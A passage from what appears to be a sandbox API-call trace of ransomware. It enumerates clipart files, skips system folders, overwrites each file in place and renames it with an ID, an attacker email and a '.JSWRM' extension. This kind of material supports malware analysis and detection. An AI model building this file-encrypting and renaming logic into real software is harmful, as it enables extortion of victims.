hHeap=0x1e0000) returned 1 [0085.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0085.814] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0158071.WMF", cAlternateFileName="")) returned 1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2=".") returned 1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="..") returned 1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="...") returned 1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="windows") returned -1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="recovery") returned -1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="perflogs") returned -1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="documents and settings") returned 1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="system volume information") returned -1 [0085.814] lstrcmpiW (lpString1="J0158071.WMF", lpString2="msocache") returned -1 [0085.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0085.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158071.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158071.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0158071.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0085.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158071.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158071.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0158071.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0085.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0085.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0085.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.815] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18652) returned 1 [0085.815] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x48d0) returned 0x24d210 [0085.815] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x48d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x48d0, lpOverlapped=0x0) returned 1 [0085.852] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.852] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x48d0, lpOverlapped=0x0) returned 1 [0085.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.852] CloseHandle (hObject=0x314) returned 1 [0085.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0085.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0085.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0085.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0085.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0085.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0085.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0085.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0085.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0085.854] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x462e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0158477.WMF", cAlternateFileName="")) returned 1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2=".") returned 1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="..") returned 1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="...") returned 1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="windows") returned -1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="recovery") returned -1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="perflogs") returned -1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="documents and settings") returned 1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="system volume information") returned -1 [0085.854] lstrcmpiW (lpString1="J0158477.WMF", lpString2="msocache") returned -1 [0085.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0085.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158477.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158477.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0158477.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0085.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0085.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158477.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0158477.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0158477.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0085.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0085.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0085.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0085.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.856] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17966) returned 1 [0085.856] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4620) returned 0x24d210 [0085.856] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4620, lpOverlapped=0x0) returned 1 [0085.882] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.882] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4620, lpOverlapped=0x0) returned 1 [0085.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.882] CloseHandle (hObject=0x314) returned 1 [0085.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0085.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0085.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0085.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0085.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0085.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0085.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.883] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0085.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0085.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0085.884] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72de, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0160590.WMF", cAlternateFileName="")) returned 1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2=".") returned 1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="..") returned 1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="...") returned 1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="windows") returned -1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="recovery") returned -1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="perflogs") returned -1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="documents and settings") returned 1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="system volume information") returned -1 [0085.884] lstrcmpiW (lpString1="J0160590.WMF", lpString2="msocache") returned -1 [0085.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0160590.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0160590.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0160590.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0160590.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0160590.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0160590.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0085.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0085.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0085.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.886] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29406) returned 1 [0085.886] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x72d0) returned 0x24d210 [0085.886] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x72d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x72d0, lpOverlapped=0x0) returned 1 [0085.890] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.890] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x72d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x72d0, lpOverlapped=0x0) returned 1 [0085.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.891] CloseHandle (hObject=0x314) returned 1 [0085.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0085.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0085.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0085.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0085.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0085.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0085.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.891] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0085.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0085.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0085.892] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb594, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0164153.JPG", cAlternateFileName="")) returned 1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2=".") returned 1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="..") returned 1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="...") returned 1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="windows") returned -1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="recovery") returned -1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="perflogs") returned -1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="documents and settings") returned 1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="$RECYCLE.BIN") returned 1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="system volume information") returned -1 [0085.892] lstrcmpiW (lpString1="J0164153.JPG", lpString2="msocache") returned -1 [0085.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0085.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0164153.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0164153.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0164153.JPG", lpUsedDefaultChar=0x0) returned 12 [0085.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0085.893] 